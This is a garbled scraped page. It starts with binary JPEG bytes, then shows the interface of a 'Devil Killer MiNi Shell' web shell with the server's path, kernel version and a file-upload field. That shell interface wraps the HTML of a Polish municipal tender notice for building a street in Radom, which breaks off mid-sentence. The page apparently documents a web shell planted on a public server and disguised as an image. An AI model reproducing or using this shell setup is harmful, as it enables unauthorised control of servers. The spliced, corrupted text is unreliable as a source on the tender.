JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211110/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211110/0026440201-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa ul. Władysława Paciaka na odcinku od ul. Słowackiego do <br/>ul. Bieszczadzkiej wraz z infrastrukturą w Radomiu </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">MIEJSKI ZARZĄD DRÓG I KOMUNIKACJI</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Dział Zamówień</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 141100028</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Romualda Traugutta 30/30A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Radom</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">26-600</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL921 - Radomski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">(48) 365-46-52</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@mzdik.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.mzdik.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> zarządzanie drogami i komunikacją </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa ul. Władysława Paciaka na odcinku od ul. Słowackiego do <br/>ul. Bieszczadzkiej wraz z infrastrukturą w Radomiu </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-ed3b9a92-412e-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00264402</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-11-10</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00000233/09/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.34 Budowa i przebudowa ulic w ramach tzw. „Czynów społecznych drogowych” - drogi wewętrzne</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://bip.mzdik.pl/mzd/zamowienia-publiczne/postepowania/2021 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między<br/>Zamawiającym, a Wykonawcami odbywa się przy użyciu miniPortalu (https://miniportal.uzp.gov.pl/),<br/>ePUAPu (https://epuap.gov.pl/wps/portal) oraz poczty elektronicznej (zamowienia@mzdik.pl), z<br/>zastrzeżeniem, że złożenie oferty następuje wyłącznie przy użyciu miniPortalu. Adres skrzynki ePUAP<br/>Zamawiającego: /mzdikradom/SkrytkaESP. Strona Zamawiającego: www.mzdik.pl.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział w niniejszym postępowaniu o udzielenie zamów. publicz., musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do formularzy: złożenia, zmiany, wycofania oferty oraz do formularza do komunikacji. Wymagania techniczne i organizacyjne wysyłania i<br/>odbierania dokumentów elektr., elektr. kopii dokumentów i oświadczeń oraz<br/>informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu miniPortal (https://miniportal.uzp.gov.pl/WarunkiUslugi) oraz Warunkach korzystania z elektr. platformy usług administracji publicznej /ePUAP/ (https://epuap.gov.pl/wps/portal/strefa-klienta/regulamin).<br/>Szczegółowe informacje dot. korzystania z systemu miniPortal dostępne są w Instrukcji Użytkownika dostępnej na stronie internetowej (https://miniportal.uzp.gov.pl/Instrukcje). Maksymalny rozmiar plików<br/>przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia, zmiany, wycofania oferty oraz do komunikacji wynosi 150 MB. Za datę przekazania oferty przyjmuje się datę jej przekazania na ePUAP, natomiast zawiadomień, dokumentów elektr., oświadczeń lub elektr. kopii dokumentów lub<br/>oświadczeń oraz innych informacji – datę ich przekazania na ePUAP lub e-mail. W celu prawidłowego złożenia oferty Wykonawcy powinni się posługiwać 32 znakowym Identyfikatorem z miniPortalu. Identyfikator postępowania o udzielenie zamówienia dostępny jest na Liście wszystkich postępowań na<br/>miniPortalu oraz na stronie internetowej prowadzonego postęp. pod adresem: (http://bip.mzdik.pl/mzd/zamowieniapubliczne/postepowania/2021). Wykonawca składa ofertę za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty lub wniosku dostępnego na ePUAP i udostępnionego na miniPortalu (https://miniportal.uzp.gov.pl). Zaszyfrowanie oferty przez Wykonawcę następuje bezpośrednio poprzez stronę: https://miniportal.uzp.gov.pl. Oferta powinna być sporządzona w języku polskim, z zachowaniem postaci elektr. w formacie danych określonych w rozporządzeniu<br/>Rady Ministrów z dnia 12.04.2012r. w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektr. oraz minimalnych wymagań dla systemów teleinformatycznych w szczególności: .doc, .docx, .pdf i opatrzona kwalifikowanym podpisem elektr., podpisem zaufanym lub podpisem osobistym. Sposób złożenia oferty, w tym zaszyfrowania oferty, opisany został w Instrukcji Użytkownika Systemu miniPortal-ePUAP. Zamawiający zaleca podpisywanie dokumentów w formacie .pdf formatem PAdES, zaś dokumenty w<br/>innym formacie niż .pdf, formatem XAdES. Wszelkie informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu ustawy z dnia 16 kwietnia 1993r. o zwalczaniu nieuczciwej konkurencji, które Wykonawca zastrzeże jako tajemnicę przedsiębiorstwa, powinny zostać złożone w osobnym pliku wraz<br/>z jednoczesnym zaznaczeniem polecenia „Załącznik stanowiący tajemnicę przedsiębiorstwa”, a następnie wraz z plikami stanowiącymi jawną część należy ten plik zaszyfrować. W przypadku konieczności złożenia w ofercie kilku dokumentów, np. oferta, pełnomocnictwo i tajemnica przedsiębiorstwa, Wykonawca może te dokumenty zapisać jako .zip, .7z i dopiero zaszyfrować lub<br/>zaszyfrować kilka plików, bez wcześniejszego tworzenia archiwum, gdzie zaszyfrowany plik automatycznie będzie miał format .zip. Jeśli w archiwum znajduje się zaszyfrowany wcześniej plik, Zamawiający może nie mieć możliwości jego odszyfrowania. Zaleca się wybranie kilku plików przez okno wyboru, aby zaszyfrować je do jednego pliku wynikowego. W przypadku przekazywania w postęp. dokumentu elektr. w formacie poddającym dane kompresji, opatrzenie pliku zawierającego skompresowane dokumenty kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, jest równoznaczne z opatrzeniem wszystkich dokumentów zawartych w tym pliku<br/>odpowiednio kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. U. UE L119 z dnia 4<br/>maja 2016r., str. 1; zwanym dalej „RODO”) informujemy, że: 1) Administratorem Pani/Pana danych<br/>osobowych jest Miejski Zarząd Dróg i Komunikacji (adres: ul. Traugutta 30/30A, 26-600 Radom, tel.<br/>(48) 365-46-52, e-mail: mzdik@mzdik.pl). Przedstawiciel: Dyrektor. 2) W sprawach ochrony danych<br/>osobowych można kontaktować się z Inspektorem Ochrony Danych Osobowych za pośrednictwem:-<br/>tel. (48) 363-14-50 wew. 405,- e-mail: inspektordanych@mzdik.pl,- pisemnie na adres siedziby<br/>Administratora Danych Osobowych, wskazany w pkt 1.1). 3) Dane osobowe przetwarzane będą na<br/>podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym postępowaniem o udzielenie<br/>zamówienia publicznego oraz w celu jego udokumentowania i archiwizacji. 4) Zamawiający przetwarza<br/>dane osobowe zebrane w niniejszym postępowaniu o udzielenie zamówienia publicznego w sposób<br/>gwarantujący zabezpieczenie przed ich bezprawnym rozpowszechnianiem. 5) Zamawiający udostępnia<br/>dane osobowe, o których mowa w art. 10 RODO w celu umożliwienia korzystania ze środków ochrony<br/>prawnej, o których mowa w Dziale IX ustawy Pzp, do upływu terminu do ich wniesienia. 6) Odbiorcami<br/>danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja<br/>postępowania w oparciu o przepisy ustawy Pzp. 7) Dane osobowe będą przechowywane przez okresy<br/>określone przepisami prawa – w tym art. 78 ust. 1 ustawy Pzp oraz według kategorii archiwalnej tej<br/>dokumentacji. 8) Podanie danych osobowych jest wymogiem ustawowym określonym w przepisach<br/>ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego.<br/>Konsekwencje niepodania określonych danych określa ustawa Pzp. 9) Dane osobowe nie będą przetwarzane w sposób zautomatyzowany, w tym nie będą podlegały profilowaniu, stosownie do art. 22<br/>RODO.10) Dane osobowe mogą być przekazywane do organów publicznych i urzędów państwowych<br/>lub innych podmiotów upoważnionych na podstawie przepisów prawa lub wykonujących zadania<br/>realizowane w interesie publicznym lub w ramach sprawowania władzy publicznej, w szczególności do<br/>podmiotów prowadzących działalność kontrolną wobec Zamawiającego. Dane osobowe są<br/>przekazywane do podmiotów przetwarzających dane w imieniu Administratora danych osobowych.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">1) Osoba, której dane dotyczą ma prawo do: a) dostępu do<br/>swoich danych osobowych – zgodnie z art. 15 RODO, przy czym w sytuacji, gdy wykonanie<br/>obowiązków, o których mowa w art. 15 ust. 1-3 RODO wymagałoby niewspółmiernie dużego wysiłku<br/>osoba ta może zostać zobowiązana do wskazania dodatkowych informacji mających na celu<br/>sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie<br/>zamówienia publicznego; b) sprostowania swoich danych osobowych – zgodnie z art. 16 RODO, przy<br/>czym skorzystanie z uprawnienia do sprostowania lub uzupełnienia danych osobowych, o którym mowa<br/>w art. 16 RODO, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia<br/>publicznego, ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może<br/>naruszać integralności protokołu oraz jego załączników; c) żądania od Zamawiającego – jako<br/>Administratora, ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których<br/>mowa w art. 18 ust. 2 RODO, przy czym prawo do ograniczenia przetwarzania nie ma zastosowania w<br/>odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w<br/>celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu<br/>publicznego Unii Europejskiej lub państwa członkowskiego; prawo to nie ogranicza przetwarzania<br/>danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia publicznego; d)<br/>wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych w przypadku uznania, iż<br/>przetwarzanie jej danych osobowych narusza przepisy o ochronie danych osobowych, w tym przepisy<br/>RODO. 2) Osobie, której dane dotyczą nie przysługuje: a) prawo do usunięcia danych osobowych - w<br/>związku z art. 17 ust. 3 lit. b, d lub e RODO; b) prawo do przenoszenia danych osobowych - w związku<br/>z art. 20 RODO; c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych<br/>osobowych, gdyż podstawą prawną przetwarzania jej danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">NZ.2603.49.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest budowa ul. Władysława Paciaka na odcinku od <br/>ul. Słowackiego do ul. Bieszczadzkiej wraz z infrastrukturą w Radomiu.<br/>Zamówienie jest realizowane w ramach zadania budżetowego pn. Budowa i <br/>przebudowa ulic w ramach tzw. „czynów społecznych drogowych”. <br/>Zamówienie obejmuje:<br/>- roboty rozbiórkowe, rozbiórki nawierzchni z elementów betonowych,<br/>- wykonanie podbudowy: wykonanie koryta, wzmocnienie podłoża, wykonanie warstwy konstrukcyjnej z kruszywa i gruntu stabilizowanego cementem,<br/>- wykonanie nawierzchni, zjazdów i chodnika z kostki wibroprasowanej,<br/>- budowę kanalizacji deszczowej,<br/>- roboty wykończeniowe: regulację wysokościową studni, zasuw kanalizacji wodociągowej, wykonanie oznakowania pionowego i poziomego, wykonanie zieleni, <br/>-	przebudowę oświetlenia ulicznego, przebudowę kolizji kabli Nn. <br/>Zakres zamówienia: długość ulicy = 0,335 km. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233120-6 - Roboty w zakresie budowy dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45232130-2 - Roboty budowlane w zakresie rurociągów do odprowadzania wody burzowej</p> <p class="mb-0">45233290-8 - Instalowanie znaków drogowych</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45311100-1 - Roboty w zakresie okablowania elektrycznego</p> <p class="mb-0">45316110-9 - Instalowanie urządzeń oświetlenia drogowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">70</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kwalifikacje i doświadczenie zawodowe osoby wyznaczonej na stanowisko kierownika budowy i robót drogowych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji jakości i rękojmi za wady na wykonane roboty</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu w<br/>okolicznościach określonych w art. 108 ust. 1 i w art. 109 ust. 1 pkt 1, 4, 5, 7 ustawy Pzp oraz<br/>spełniają określone przez Zamawiającego warunki udziału w postępowaniu dotyczące: 1)<br/>zdolności do występowania w obrocie gospodarczym: Zamawiający nie stawia warunku w<br/>powyższym zakresie. 2) uprawnień do prowadzenia określonej działalności gospodarczej lub<br/>zawodowej, o ile wynika to z odrębnych przepisów: Zamawiający nie stawia warunku w<br/>powyższym zakresie. 3) sytuacji ekonomicznej lub finansowej: Zamawiający nie stawia warunku<br/>w powyższym zakresie. 4) zdolności technicznej lub zawodowej: a) w okresie ostatnich 5 lat<br/>licząc wstecz od dnia, w którym upływa termin składania ofert, a jeżeli okres prowadzenia<br/>działalności jest krótszy - w tym okresie, wykonał (zakończył) należycie co najmniej dwa zadania<br/>polegające<br/>na budowie lub przebudowie drogi lub ulicy o długości co najmniej 300 m, w<br/>której skład wchodziła budowa oświetlenia i kanalizacji deszczowej; b) dysponuje lub będzie dysponował osobami<br/>skierowanymi przez Wykonawcę do realizacji zamówienia, legitymującymi się kwalifikacjami<br/>zawodowymi i uprawnieniami (wymaganymi przez Prawo budowlane) oraz doświadczeniem,<br/>niezbędnymi do wykonania przedmiotowego zamówienia oraz odpowiednimi do stanowisk jakie<br/>im zostaną powierzone – zgodnie z poniższym wykazem: - minimum jedną osobą na stanowisko<br/>kierownika budowy i robót drogowych posiadającą: • uprawnienia budowlane do<br/>kierowania robotami budowlanymi w specjalności drogowej lub odpowiadające im ważne<br/>uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących<br/>przepisów oraz • doświadczenie w pełnieniu funkcji kierownika budowy lub/i kierownika robót<br/>drogowych, lub inspektora nadzoru robót drogowych przy realizacji minimum dwóch zadań<br/>polegających na budowie lub przebudowie drogi lub ulicy o długości co<br/>najmniej 300 m, w której skład wchodziła budowa oświetlenia i kanalizacji deszczowej; -	minimum jedną osobą na stanowisko kierownika robót kanalizacyjnych posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci kanalizacyjnych lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów. - minimum jedną osobą na<br/>stanowisko kierownika robót elektrycznych i elektroenergetycznych posiadającą uprawnienia<br/>budowlane bez ograniczeń do kierowania robotami budowlanymi w specjalności instalacyjnej w<br/>zakresie sieci elektrycznych i elektroenergetycznych lub odpowiadające im ważne uprawnienia<br/>budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów. UWAGA!<br/>Każde zadanie winno stanowić oddzielne zamówienie, zrealizowane na podstawie jednej,<br/>odrębnej umowy. 2. Zamawiający, w stosunku do Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia, w odniesieniu do warunku dotyczącego zdolności technicznej lub<br/>zawodowej – dopuszcza łączne spełnianie warunku przez Wykonawców. 3. Zamawiający może,<br/>na każdym etapie postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności,<br/>jeżeli posiadanie przez Wykonawcę sprzecznych interesów, w szczególności zaangażowanie<br/>zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze<br/>Wykonawcy może mieć negatywny wpływ na realizację zamówienia. 4. Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu polegać na zdolnościach<br/>technicznych lub zawodowych podmiotów udostępniających zasoby, niezależnie od charakteru<br/>prawnego łączących go z nimi stosunków prawnych. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Podmiotowe środki dowodowe wymagane od Wykonawcy w 